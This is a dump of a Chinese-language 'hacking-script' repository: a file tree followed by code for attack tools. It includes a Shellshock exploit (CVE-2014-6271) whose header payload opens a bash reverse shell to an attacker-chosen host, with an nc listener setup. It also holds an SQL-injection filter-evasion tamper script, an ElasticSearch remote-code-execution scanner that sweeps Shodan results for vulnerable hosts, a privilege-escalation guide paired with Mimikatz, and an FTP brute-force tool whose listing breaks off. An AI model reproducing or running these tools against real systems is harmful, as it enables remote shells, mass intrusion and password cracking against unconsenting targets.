├── 1.py ├── AWVS11批量添加扫描.py ├── Apache Tomcat爆破.py ├── Awvs-Automation ├── Awvs.py ├── README.md ├── WCSpider │ ├── README.md │ ├── WCSpider.py │ └── WooyunCompany20160316.txt ├── cmdline.py ├── conf.py ├── parsexml.py └── sendmail.py ├── CTF ├── CSRFTester-1.0 │ ├── OWASP-CSRFTester-1.0.jar │ ├── lib │ │ └── concurrent.jar │ └── run.bat └── CTF.txt ├── CVE-2014-6271-master ├── README.md └── shellpoc.py ├── CVE-2017-0213--master └── README.md ├── DBSQL.rar ├── ElasticSearch远程任意代码执行漏洞利用工具(CVE-2014-3120) ├── check.py └── exp.py ├── FTP暴力破解工具多线程版.py ├── FTP暴力破解脚本.py ├── Goohak ├── README.md └── goohak ├── IISRCE-CVE-2017-7269 检测工具 └── IISRCE-CVE-2017-7269.exe ├── Invoke-NetMonKey.ps1 ├── MS16-032-master ├── README.md ├── ms16-032.png ├── ms16-032.sln └── ms16-032 │ ├── ms16-032.cpp │ ├── ms16-032.vcxproj │ ├── ms16-032.vcxproj.filters │ └── ms16-032.vcxproj.user ├── Mdic.py ├── NTFS交换数据流检测工具.rar ├── Python3写的ZoomEye查询脚本.py ├── PythonSpider-BeeBeeto ├── BeeBeetoSpider.py ├── BeeBeetoSpider02.py ├── BeeBeetoSpider03.py └── README.MD ├── PythonSpider-Wooyun ├── IVSpider-Wooyun │ ├── IVSpider.py │ ├── IVSpider02.py │ ├── README.md │ └── cmdline.py ├── README.md └── WVSearch │ ├── README.md │ ├── WVSearch.py │ ├── cmdline.py │ ├── report.py │ └── report │ └── .gitigonre ├── QQDataSearcher.rar ├── SSH暴力破解.py ├── Smbscan ├── Smbtouch-1.1.1.0.xml ├── Smbtouch-1.1.1.fb ├── Smbtouch-1.1.1.xml ├── cmd.cmd ├── ip.txt ├── ips.txt ├── pytrch.py ├── pytrch.pyc └── smbscan.py ├── Struts2多个漏洞的批量验证+利用集成版(py).py ├── TELNET暴力破解.py ├── WebAdminLoginFinder.py ├── ZoomEye_API搜索脚本修改优化版.py ├── adminfinder.py ├── cc.py ├── cgi.py ├── com_user server scanner.py ├── curl_flood.txt ├── dumpdz.zip ├── findip.py ├── firefox_security_toolkit.sh ├── git-all-secrets-master ├── .gitignore ├── Dockerfile ├── LICENSE ├── README.md ├── main.go ├── rungitsecrets.sh └── thog │ ├── .gitignore │ ├── requirements.txt │ ├── setup.cfg │ ├── setup.py │ └── truffleHog │ ├── __init__.py │ └── truffleHog.py ├── httpscan.py ├── ip-location ├── LICENSE ├── Mobile_Detect.php ├── README.md └── ip.php ├── ip2geo.py ├── ip地址精准定位.py ├── ip物理地址定位.py ├── kali-tools-master ├── .gitignore ├── LICENCE ├── README.md ├── data.py ├── demo1.png ├── demo2.png ├── helpers.py └── kali.py ├── lcy ├── exploits │ ├── server │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── redis_remote.py │ │ └── redis_remote.pyc │ └── website │ │ ├── Disucz3_flvplayer_swf_xss.py │ │ ├── Disucz3_flvplayer_swf_xss.pyc │ │ ├── __init__.py │ │ ├── dedecms_mysql_error_trace_inc.py │ │ ├── dedecms_mysql_error_trace_inc.pyc │ │ ├── dedecms_search_php_sql_inject.py │ │ ├── dedecms_search_php_sql_inject.pyc │ │ ├── dedecms_swfupload_xss.py │ │ ├── dedecms_swfupload_xss.pyc │ │ ├── http_sys.py │ │ ├── http_sys.pyc │ │ ├── redis_remote.py │ │ ├── svn_information_disclosure.py │ │ ├── svn_information_disclosure.pyc │ │ ├── webserver_Parsing_vulnerability.py │ │ └── webserver_Parsing_vulnerability.pyc ├── lcy.py ├── lib │ ├── Color.py │ ├── Color.pyc │ ├── __init__.py │ ├── __init__.pyc │ ├── consle_width.py │ ├── consle_width.pyc │ ├── framework.py │ ├── framework.pyc │ ├── util.py │ ├── util.pyc │ ├── work.py │ └── work.pyc └── result │ ├── 20160921_25872.html │ ├── 20160921_3030.html │ ├── 20160921_35187.html │ ├── 20160921_4838.html │ ├── 20160921_74289.html │ ├── 20160921_76544.html │ └── 20160921_84164.html ├── ldap匿名访问检测脚本.py ├── ms17010 ├── IpScanResult.txt ├── go.bat ├── ip.txt ├── ms.exe ├── ms17010.jar └── readme.txt ├── mysql.php ├── nopetyavac.bat ├── nsa应急策略.bat ├── petya系列勒索木马免疫脚本.bat ├── phpcms_getshell.exe ├── plink用法.txt ├── portscan.py ├── python二级域名批量采集脚本 ├── getsubdomain.pdf └── getsubdomain.py ├── python抓取谷歌链接工具 ├── getlink.pdf └── getlink.py ├── python未授权访问提取特定数据脚本.py ├── python版本的小葵转换工具.py ├── qq.rar ├── qq群社工库处理.txt ├── qunlist.bat ├── redis未授权扫描 └── redis-test.py ├── runassystem权限小工具.bat ├── s2批量检测.py ├── sgk数据清洗 ├── BigDupRemove.zip ├── es_import-master │ ├── .gitignore │ ├── LICENSE │ ├── README.md │ └── es_import.py ├── quchong.py ├── 去重.py ├── 去重可排序.py ├── 文本去重.py └── 文本去重工具.exe ├── smtp爆破脚本.py ├── struts2 ├── St2关键词.txt ├── Struts2多版本一次性检测工具V3.0.jar ├── s02-46命令执行支持ssl_python源码.py ├── s2-045 POC │ └── HttpCodeLib.dll ├── s2-045.py ├── s2-046.sh ├── s2-046源码 │ ├── s2-045.sln │ ├── s2-045.v12.suo │ └── s2-045 │ │ ├── Form1.Designer.cs │ │ ├── Form1.cs │ │ ├── Form1.resx │ │ ├── Program.cs │ │ ├── Properties │ │ ├── AssemblyInfo.cs │ │ ├── Resources.Designer.cs │ │ ├── Resources.resx │ │ ├── Settings.Designer.cs │ │ └── Settings.settings │ │ ├── obj │ │ ├── Debug │ │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── s2-045.csproj.FileListAbsolute.txt │ │ │ ├── s2-045.csproj.GenerateResource.Cache │ │ │ ├── s2-045.csprojResolveAssemblyReference.cache │ │ │ ├── s2-045.exe │ │ │ ├── s2-045.pdb │ │ │ ├── s2_045.Form1.resources │ │ │ └── s2_045.Properties.Resources.resources │ │ └── Release │ │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── s2-045.csproj.FileListAbsolute.txt │ │ │ ├── s2-045.csproj.GenerateResource.Cache │ │ │ ├── s2-045.csprojResolveAssemblyReference.cache │ │ │ ├── s2-045.exe │ │ │ ├── s2-045.pdb │ │ │ ├── s2_045.Form1.resources │ │ │ └── s2_045.Properties.Resources.resources │ │ └── s2-045.csproj ├── s2045一键getshell │ ├── pi_struts2-045.py │ ├── readme.txt │ ├── tmp.txt │ └── url.txt ├── s2getshell.py ├── st2-046-poc │ ├── README.MD │ ├── exploit-cd.sh │ ├── reqnull.txt │ ├── st2-046.jpg │ └── st2-046.png ├── str2-045.txt ├── struts2_045 多线程批量检测脚本.py └── 熟练利用google,shodan及bing hacking辅助快速渗透[主要针对大型目标].txt ├── struts2批量查询.py ├── t00lsAddTu ├── config.py ├── config.pyc ├── discuz.py ├── discuz.pyc └── login.py ├── url.py ├── weakfilescan.txt ├── webshell下远程连接linux服务器并执行命令工具 ├── plink.exe └── plink用法.txt ├── windows-exploit-suggester.py ├── 一个小脚本查看PC连接过的WIFI密码.bat ├── 一些命令.txt ├── 一键实现--强制通过VPN上网,VPN断线就断网.bat ├── 全自动脱裤脚本.php ├── 关于字典整理的一些shell命令.txt ├── 内网域环境获取当前主机所在域名.bat ├── 去重可排序.py ├── 反弹dll ip修改小脚本(445 NC).py ├── 在一堆文本中提取出 域名(脚本).php ├── 处理awvs10.5扫描结果xml文件的py脚本 ├── 多线程zabbix批量工具.py ├── 字典加dz uc_key getshell ├── discuz_getshell.py └── 字典.rar ├── 导出浏览器密码.py ├── 弱编码MD5小脚本py.py ├── 扫描内网IP 对应MAC地址 网卡名字 内网渗透时候可以用到-t00ls.rar ├── 批量get flag的python脚本.py ├── 批量扫描注入点-小葵.py ├── 批量验证代理ip.py ├── 把所有的网关选出来.py ├── 数据库通用查询脚本.py ├── 源端口反弹shell.py ├── 特殊命令.txt ├── 用python自动拔号并取本地网卡的IP地址外网IP地址以及下一跳由的地址.py ├── 百度url采集.py ├── 端口扫描 ├── sm.py └── 使用.txt ├── 简利同IP站查询:.py ├── 脱裤脚本.php ├── 记录root密码.py └── 邮箱爆破.py /1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | 5 | 6 | """ 7 | 8 | from lib.core.enums import PRIORITY 9 | 10 | __priority__ = PRIORITY.LOW 11 | 12 | def dependencies(): 13 |     pass 14 | 15 | def tamper(payload, **kwargs): 16 |     """ 17 |     Replaces space character (' ') with plus ('/**)*/') 18 | 19 |     >>> tamper('SELECT id FROM users') 20 |     'SELECT/**)*/id/**)*/FROM/**)*/users' 21 |          22 |     """ 23 | 24 |     retVal = payload 25 | 26 |     if payload: 27 |         retVal = "" 28 |         quote, doublequote, firstspace = False, False, False 29 | 30 |         for i in xrange(len(payload)): 31 |             if not firstspace: 32 |                 if payload.isspace(): 33 |                     firstspace = True 34 |                     retVal += "/**)*/" 35 |                     continue 36 | 37 |             elif payload == '\'': 38 |                 quote = not quote 39 | 40 |             elif payload == '"': 41 |                 doublequote = not doublequote 42 | 43 |             elif payload == " " and not doublequote and not quote: 44 |                 retVal += "/**)*/" 45 |                 continue 46 | 47 |             retVal += payload 48 | 49 |     return retVal -------------------------------------------------------------------------------- /AWVS11批量添加扫描.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/AWVS11批量添加扫描.py -------------------------------------------------------------------------------- /Apache Tomcat爆破.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/Apache Tomcat爆破.py -------------------------------------------------------------------------------- /Awvs-Automation/Awvs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | import time 5 | import subprocess 6 | import os 7 | from Queue import Queue 8 | from threading import Thread 9 | from parsexml import parse_xml 10 | from cmdline import parse_args 11 | from sendmail import send_main 12 | from conf import wvs_console, save_folder, scan_command, mail_list 13 | import sys 14 | 15 | # 用于保存url的队列 16 | url_queue = Queue() 17 | 18 | def read_url(file): 19 | 20 | with open(file, 'r') as f: 21 | for each in f: 22 | # 每个读取出来的url都带了后面的\n,所以需要去除 23 | each_url = each.replace('\n', '') 24 | url_queue.put(each_url) 25 | 26 | 27 | # 调用wvs_console进行扫描 28 | def wvs_scan(url): 29 | 30 | save_name = time.strftime('%Y%m%d', time.localtime()) + r'\\' + url 31 | # 判断保存目录是否存在,不存在则创建 32 | save_path = save_folder + save_name 33 | if not os.path.exists(save_path): 34 | os.makedirs(save_path) 35 | wvs_command = wvs_console + scan_command % (url, save_path) 36 | print wvs_command 37 | # 如果有漏洞,返回码大于0,小于0是异常 38 | exitcode = subprocess.call(wvs_command) 39 | if exitcode < 0: 40 | sys.exit() 41 | result = str(exitcode) + '|' + save_path 42 | return result 43 | 44 | 45 | class ScanThread(Thread): 46 | 47 | def __init__(self): 48 | Thread.__init__(self) 49 | 50 | def run(self): 51 | while True: 52 | if url_queue.empty(): break 53 | scan_url = url_queue.get() 54 | scan_resutl = wvs_scan(scan_url) 55 | (code, save_load) = scan_resutl.split('|') 56 | if code > 0: 57 | xml_result = parse_xml(save_load + '\\export.xml') 58 | # str.join(sequence),序列之间用str间隔,这里用换行来间隔转换成字符串 59 | send_main(mail_list, 'WvsScanner Report--'+scan_url, '\n'.join(xml_result)) 60 | url_queue.task_done() 61 | 62 | 63 | def main(url_l, t_num): 64 | read_url(url_l) 65 | thread = [] 66 | 67 | for x in range(t_num): 68 | thread.append(ScanThread()) 69 | thread[x].start() 70 | 71 | for i in thread: 72 | if i.isAlive(): 73 | i.join() 74 | 75 | 76 | if __name__ == "__main__": 77 | 78 | arg = parse_args() 79 | url_list = arg.u 80 | cmd_num = arg.t 81 | main(url_list, cmd_num) 82 | -------------------------------------------------------------------------------- /Awvs-Automation/README.md: -------------------------------------------------------------------------------- 1 | ##Usage 2 | ``` 3 | usage: Awvs.py [Option] 4 | 5 | * Awvs scanning by python * 6 | 7 | optional arguments: 8 | -h, --help show this help message and exit 9 | -u UrlPath The url list for scanning (default: H:\Awvs\Url\1_url.txt) 10 | -t ThreadNum The wvs_console number, should be a int between 1 and 10 11 | (default: 3) 12 | 13 | ``` 14 | ##Instruction 15 | ``` 16 | 1. 自行设置具体路径等内容 17 | 2. 利用wvs_console.exe来实现扫描txt文本内的url列 18 | 3. 多开wvs_console.exe来实现多线程的同时扫描 19 | 4. 扫描后xml分析结果,有漏洞发送指定邮箱报告 20 | ``` 21 | ##Example 22 | ``` 23 | python Awvs.py -u H:\url.txt -t 2 24 | ``` 25 | ##Bug 26 | ``` 27 | 1. 多线程可能不是线程池的方式,有时候会出现错误,询问是否保存 28 | 2. 太占网络带宽了,用一下就根本无法流量其他网页了 29 | ``` 30 | -------------------------------------------------------------------------------- /Awvs-Automation/WCSpider/README.md: -------------------------------------------------------------------------------- 1 | #WCSpider 2 | **W**ooyun **C**ompany **S**pider 3 | ##Usage 4 | ``` 5 | usage: WCSpider.py [option] 6 | 7 | * Wooyun Company Spider * 8 | 9 | optional arguments: 10 | -h, --help show this help message and exit 11 | -p Page The end page for crawling (default: 45) 12 | 13 | ``` 14 | ##Instruction 15 | ``` 16 | 1. Python 2.7.x && BeautifulSoup4==4.3.2 17 | 2. 默认爬取45页面,可以自定义页面数 18 | 3. 以日期的形式保存为txt文件 19 | ``` 20 | ##Example 21 | ``` 22 | python WCSpider.py -p 46 23 | ``` 24 | -------------------------------------------------------------------------------- /Awvs-Automation/WCSpider/WCSpider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | """ 5 | Function: Wooyun Company Spider 6 | Author: Pyx 7 | Time: 2016年3月16日 15:05:19 8 | """ 9 | 10 | import urllib2 11 | from bs4 import BeautifulSoup 12 | import random 13 | import time 14 | import argparse 15 | 16 | 17 | def url_res(url): 18 | # 设置一个随机的用户代理,模拟浏览器 19 | user_agent = ["Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0", 20 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", 21 | "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1", 22 | "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11", 23 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)"] 24 | req = urllib2.Request(url) 25 | req.add_header('User-Agent', random.choice(user_agent)) 26 | 27 | while True: 28 | try: 29 | res = urllib2.urlopen(req) 30 | except Exception, e: 31 | continue 32 | else: 33 | return res 34 | 35 | 36 | def url_soup(url): 37 | soup = BeautifulSoup(url_res(url).read(), 'html.parser', from_encoding='UTF-8') 38 | soup = soup.find_all('a', rel="nofollow") 39 | for each in soup: 40 | print each.string 41 | save_result(each.string.encode('utf-8')) 42 | 43 | 44 | def save_result(company): 45 | # 保存文件名附带时间 46 | report_name = 'WooyunCompany' + time.strftime('%Y%m%d', time.localtime()) + '.txt' 47 | with open(report_name, 'a+') as f: 48 | f.write(company) 49 | f.write('\n') 50 | 51 | 52 | def main(p_num): 53 | # 从第一页开始,最后一页加1 54 | for x in range(1, p_num+1): 55 | url = "http://www.wooyun.org/corps/page/" + str(x) 56 | url_soup(url) 57 | 58 | if __name__ == '__main__': 59 | # 设置一个命令行参数p,默认45页,以后厂商多了,可以自行设定 60 | parser = argparse.ArgumentParser(prog='WCSpider', usage='WCSpider.py [option]', 61 | formatter_class=argparse.ArgumentDefaultsHelpFormatter, 62 | description="* Wooyun Company Spider *") 63 | parser.add_argument('-p', metavar='Page', default=45, type=int, help='The end page for crawling') 64 | arg = parser.parse_args() 65 | page = arg.p 66 | main(page) 67 | print "-----------------It's done-------------------" 68 | -------------------------------------------------------------------------------- /Awvs-Automation/cmdline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | import argparse 5 | import sys 6 | from conf import url_txt 7 | 8 | 9 | def parse_args(): 10 | parser = argparse.ArgumentParser(prog='Awvs', usage="Awvs.py [Option]", 11 | description="* Awvs scanning by python *", 12 | formatter_class=argparse.ArgumentDefaultsHelpFormatter) 13 | 14 | parser.add_argument('-u', metavar='UrlPath', type=str, default=url_txt, 15 | help="The url list for scanning") 16 | parser.add_argument('-t', metavar='ThreadNum', type=int, default=3, 17 | help='The wvs_console number, should be a int between 1 and 10') 18 | 19 | if len(sys.argv) == 1: 20 | sys.argv.append('-h') 21 | 22 | args = parser.parse_args() 23 | check_args(args) 24 | return args 25 | 26 | 27 | def check_args(args): 28 | 29 | if not (args.t >= 1 and args.t <= 10): 30 | raise Exception('-t must be an integer between 1 and 10') 31 | -------------------------------------------------------------------------------- /Awvs-Automation/conf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | wvs_console = r'H:\Web Vulnerability Scanner 10\wvs_console.exe ' # wvs_console的路径 5 | 6 | save_folder = r'H:\Awvs\Result\\' # 保存记录的目录,后面如果需要对反斜杠转义,否则反斜杠对后面的单引号转义 7 | 8 | url_txt = r'H:\Awvs\Url\1_url.txt' # 待检测url文本 9 | 10 | # wvs扫描语句(--不扫描当前目录以上的其他目录(二级目录有效),--启发式扫描) 11 | scan_command = "/Scan %s /Profile default /ExportXML /SaveFolder %s --RestrictToBaseFolder=true " \ 12 | "--ScanningMode=Heuristic" 13 | 14 | # 邮箱 15 | mail_host = "smtp.163.com" 16 | mail_user = "123" #发件帐号 17 | mail_pass = "123" #发件密码 18 | mail_postfix = "163.com" 19 | mail_list = ['123@qq.com'] #收件人 20 | -------------------------------------------------------------------------------- /Awvs-Automation/parsexml.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | from xml.dom import minidom 5 | import sys 6 | 7 | 8 | # 对扫描结果进行分析 9 | def parse_xml(xml_name): 10 | result = [] 11 | tmp_result = [] 12 | color_list = {'red': 'High', 'orange': 'Medium', 'blue': 'Low', 'green': 'Info'} 13 | try: 14 | dom = minidom.parse(xml_name) 15 | root = dom.documentElement 16 | report_node = root.getElementsByTagName('ReportItem') 17 | # 只有一个节点所以用列表中的[0]取得其中的唯一一个,节点中的子节点的值 18 | result.append(root.getElementsByTagName("StartURL")[0].childNodes[0].nodeValue) 19 | result.append(root.getElementsByTagName("StartTime")[0].childNodes[0].nodeValue) 20 | result.append(root.getElementsByTagName("FinishTime")[0].childNodes[0].nodeValue) 21 | result.append(root.getElementsByTagName("ScanTime")[0].childNodes[0].nodeValue) 22 | if report_node: 23 | for node in report_node: 24 | # 获得color节点的属性值 25 | color = node.getAttribute('color') 26 | name = node.getElementsByTagName('Name')[0] 27 | if color in color_list: 28 | # 因为color后面接漏洞名,需要空个tab 29 | color_result = color_list[color] + '\t' 30 | else: 31 | color_result = 'Other\t' 32 | for vul_node in name.childNodes: 33 | tmp_result.append(color_result + vul_node.nodeValue) 34 | result2 = sortresultlist(tmp_result) 35 | result.append('Vulnerable Count:' + str(len(result2))) 36 | for n in xrange(len(result2)): 37 | result.append(result2[n]) 38 | except Exception, e: 39 | sys.exit("Error in parse xml: %s" % e) 40 | 41 | return result 42 | 43 | 44 | # 将扫描结果进行排序,这太渣了 45 | def sortresultlist(List): 46 | Result = [] 47 | for i in List: 48 | if i.startswith('High'): 49 | Result.append(i) 50 | for i in List: 51 | if i.startswith('Medium'): 52 | Result.append(i) 53 | for i in List: 54 | if i.startswith('Low'): 55 | Result.append(i) 56 | for i in List: 57 | if i.startswith('Info'): 58 | Result.append(i) 59 | for i in List: 60 | if i.startswith('Other'): 61 | Result.append(i) 62 | return Result 63 | -------------------------------------------------------------------------------- /Awvs-Automation/sendmail.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | import smtplib 5 | import time 6 | from email.mime.text import MIMEText 7 | from conf import mail_host, mail_user, mail_pass, mail_postfix 8 | 9 | 10 | def send_main(to_mail, title, content): 11 | from_mail = "WvsScanner<" + mail_user + "@" + mail_postfix + ">" 12 | msg = MIMEText(content, _subtype='plain', _charset='utf-8') 13 | msg['Subject'] = title 14 | msg['From'] = from_mail 15 | msg['To'] = ";".join(to_mail) 16 | try: 17 | server = smtplib.SMTP() 18 | server.connect(mail_host) 19 | server.login(mail_user, mail_pass) 20 | server.sendmail(from_mail, to_mail, msg.as_string()) 21 | server.close() 22 | return True 23 | except Exception, e: 24 | catch_write(str(e)) 25 | return False 26 | 27 | 28 | def catch_write(err_code): 29 | file_name = "mail_error.txt" 30 | err_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()) 31 | with open(file_name, 'a') as f: 32 | f.write(err_time + '\t' + err_code + '\n') 33 | 34 | # 测试用 35 | # if __name__ == "__main__": 36 | # mail_list = ['test@qq.com'] 37 | # send_main(mail_list, '22', '22') 38 | -------------------------------------------------------------------------------- /CTF/CSRFTester-1.0/OWASP-CSRFTester-1.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/CTF/CSRFTester-1.0/OWASP-CSRFTester-1.0.jar -------------------------------------------------------------------------------- /CTF/CSRFTester-1.0/lib/concurrent.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/CTF/CSRFTester-1.0/lib/concurrent.jar -------------------------------------------------------------------------------- /CTF/CSRFTester-1.0/run.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | SET JAVA_HOME=C:\AppSecWorkbench\jdk16\jre 4 | SET PATH=%PATH%;%JAVA_HOME%\bin 5 | 6 | java -classpath .;lib/concurrent.jar;OWASP-CSRFTester-1.0.jar org.owasp.csrftester.CSRFTester 7 | -------------------------------------------------------------------------------- /CTF/CTF.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/CTF/CTF.txt -------------------------------------------------------------------------------- /CVE-2014-6271-master/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2014-6271 2 | ### python2.7 3 | 4 | - Start listening on your machine. 5 | ``` 6 | nc -l -p 4444 7 | ``` 8 | 9 | - Run python script by the rule below: 10 | > python shellpoc.py \ \ 11 | ``` 12 | python shellpoc.py 10.10.10.101 /cgi-bin/status 10.10.10.1/4444 13 | ``` 14 | 15 | - Enjoy 16 | -------------------------------------------------------------------------------- /CVE-2014-6271-master/shellpoc.py: -------------------------------------------------------------------------------- 1 | # 2 | #CVE-2014-6271 cgi-bin reverse shell 3 | # 4 | 5 | import httplib,urllib,sys 6 | 7 | if (len(sys.argv)<4): 8 | print "Usage: %s " % sys.argv[0] 9 | print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] 10 | exit(0) 11 | 12 | conn = httplib.HTTPConnection(sys.argv[1]) 13 | reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] 14 | 15 | headers = {"Content-type": "application/x-www-form-urlencoded", 16 | "test":reverse_shell } 17 | conn.request("GET",sys.argv[2],headers=headers) 18 | res = conn.getresponse() 19 | print res.status, res.reason 20 | data = res.read() 21 | print data -------------------------------------------------------------------------------- /CVE-2017-0213--master/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0213 2 | # to get privilege Administator from CMD 3 | 4 | ### Vulnerable 5 | 6 | | Product | Version | Update | Tested | 7 | | :------------------ | :------ | :----- | :----- | 8 | | Windows 10 | | | √ | 9 | | Windows 10 | 1511 | | | 10 | | Windows 10 | 1607 | | | 11 | | Windows 10 | 1703 | | √ | 12 | | Windows 7 | | SP1 | √ | 13 | | Windows 8.1 | | | | 14 | | Windows RT 8.1 | | | | 15 | | Windows Server 2008 | | SP2 | | 16 | | Windows Server 2008 | R2 | SP1 | | 17 | | Windows Server 2012 | | | | 18 | | Windows Server 2012 | R2 | | | 19 | | Windows Server 2016 | | | | 20 | 21 | # 1 22 | 23 | ![1222222222222](https://user-images.githubusercontent.com/25440152/26889235-cd0fd188-4bad-11e7-93ae-78109cce187b.PNG) 24 | # 2 25 | 26 | ![1222222222222222222](https://user-images.githubusercontent.com/25440152/26889237-ce670f06-4bad-11e7-9595-5a8e6e3d5bed.PNG) 27 | 28 | # use Mimikatz CVE-2017-0213 29 | # But do not use On cmd Administator 30 | # But On Prject Cmder ! 31 | 32 | # Download Cmder ! 33 | # http://cmder.net/ 34 | # After the download 35 | # Turn on Cmder from CVE-2017-0213 And then run Mimikatz On Cmder 36 | # Some pictures ! 37 | 38 | # 1 39 | ![2323](https://user-images.githubusercontent.com/25440152/26889465-917244b6-4bae-11e7-8ab0-f2e8742970f9.PNG) 40 | 41 | # 2 42 | ![122222222222222222](https://user-images.githubusercontent.com/25440152/26889702-3f5b856a-4baf-11e7-9f29-71eda4b38c84.PNG) 43 | 44 | # 3 45 | ![capture](https://user-images.githubusercontent.com/25440152/26889863-cd75c162-4baf-11e7-9708-cb370ae4b07a.PNG) 46 | 47 | **Video:** [Youtube](https://www.youtube.com/watch?v=Y_lTfhhgppE&t=1s) 48 | 49 | -------------------------------------------------------------------------------- /DBSQL.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/DBSQL.rar -------------------------------------------------------------------------------- /ElasticSearch远程任意代码执行漏洞利用工具(CVE-2014-3120)/check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | #by ha.cker@me.com 4 | import time 5 | import shodan 6 | import sys 7 | import urllib 8 | import simplejson 9 | import socket 10 | print '******************************************************' 11 | print '* Elasticsearch vul found Tool *' 12 | print '* Write by ha.cker@me.com *' 13 | print '* U can use shodan api to search the vul host *' 14 | print '******************************************************' 15 | # Configuration 16 | API_KEY = ""# api 17 | 18 | def check(ip): 19 | ip=ip 20 | socket.setdefaulttimeout(3) 21 | try: 22 | rs = urllib.urlopen('http://'+'%s'% ip +':9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22t%22:{%22script%22:%22Integer.toHexString(31415926)%22}}}}') 23 | rs = rs.read() 24 | rs = simplejson.loads(rs) 25 | except: 26 | pass 27 | try: 28 | for t in rs['hits']['hits'][0]['fields']['t']: 29 | t=t 30 | except: 31 | pass 32 | else: 33 | print 'found vul host : %s' % ip 34 | def main(): 35 | try: 36 | # Setup the api 37 | api = shodan.Shodan(API_KEY) 38 | query = 'you Know, for' 39 | for i in range(1,100): 40 | page = i 41 | try: 42 | result = api.search(query,page) 43 | except Exception, e: 44 | print 'Error: %s and sleep 10 s' % e 45 | time.sleep(10) 46 | pass 47 | else: 48 | for service in result['matches']: 49 | ip = service['ip_str'] 50 | ip=str(ip) 51 | check(ip) 52 | # Loop through the matches and print each IP 53 | 54 | 55 | except Exception, e: 56 | print 'Error: %s and sleep 10 s' % e 57 | print i 58 | sys.exit(1) 59 | 60 | if __name__ == '__main__': 61 | main() -------------------------------------------------------------------------------- /FTP暴力破解工具多线程版.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # -*- coding: gbk -*- 4 | # -*- coding: utf_8 -*- 5 | # Date: 2014/9/5 6 | # Created by 独自等待 7 | # 博客 http://www.waitalone.cn/ 8 | from threading import Thread 9 | import ftplib, socket 10 | import sys, time, re 11 | 12 | 13 | def usage(): 14 | print '+' + '-' * 50 + '+' 15 | print '\t Python FTP暴力破解工具多线程版' 16 | print '\t Blog:http://www.waitalone.cn/' 17 | print '\t\t Code BY: 独自等待' 18 | print '\t\t Time:2014-09-05' 19 | print '+' + '-' * 50 + '+' 20 | if len(sys.argv) != 4: 21 | print "用法: ftpbrute_mult.py 待破解的ip/domain 用户名列表 字典列表" 22 | print "实例: ftpbrute_mult.py www.waitalone.cn user.txt pass.txt" 23 | sys.exit() 24 | 25 | 26 | def brute_anony(): 27 | try: 28 | print '[+] 测试匿名登陆……\n' 29 | ftp = ftplib.FTP() 30 | ftp.connect(host, 21, timeout=10) 31 | print 'FTP消息: %s \n' % ftp.getwelcome() 32 | ftp.login() 33 | ftp.retrlines('LIST') 34 | ftp.quit() 35 | print '\n[+] 匿名登陆成功……\n' 36 | except ftplib.all_errors: 37 | print '\n[-] 匿名登陆失败……\n' 38 | 39 | 40 | def brute_users(user, pwd): 41 | try: 42 | ftp = ftplib.FTP() 43 | ftp.connect(host, 21, timeout=10) 44 | ftp.login(user, pwd) 45 | ftp.retrlines('LIST') 46 | ftp.quit() 47 | print '\n[+] 破解成功,用户名:%s 密码:%s\n' % (user, pwd) 48 | except ftplib.all_errors: 49 | pass 50 | 51 | 52 | if __name__ == '__main__': 53 | usage() 54 | start_time = time.time() 55 | if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]): 56 | host = sys.argv[1] 57 | else: 58 | host = socket.gethostbyname(sys.argv[1]) 59 | userlist = [i.rstrip() for i in open(sys.argv[2])] 60 | passlist = [j.rstrip() for j in open(sys.argv[3])] 61 | print '目 标:%s \n' % sys.argv[1] 62 | print '用户名:%d 条\n' % len(userlist) 63 | print '密 码:%d 条\n' % len(passlist) 64 | brute_anony() 65 